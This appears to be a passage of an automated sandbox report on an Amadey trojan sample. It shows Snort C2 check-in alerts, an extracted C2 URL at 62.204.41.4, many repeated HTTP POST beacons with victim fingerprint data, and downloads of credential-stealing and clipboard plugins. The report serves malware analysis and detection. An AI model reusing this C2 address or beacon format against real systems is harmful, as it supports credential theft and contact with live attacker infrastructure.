                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50184 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50185 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50186 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50187 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50188 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50189 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50190 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50191 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50192 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50193 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50194 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50195 -> 62.204.41.4:80
                            Source: Malware configuration extractorURLs: 62.204.41.4/Gol478Ns/index.php
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
                            Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
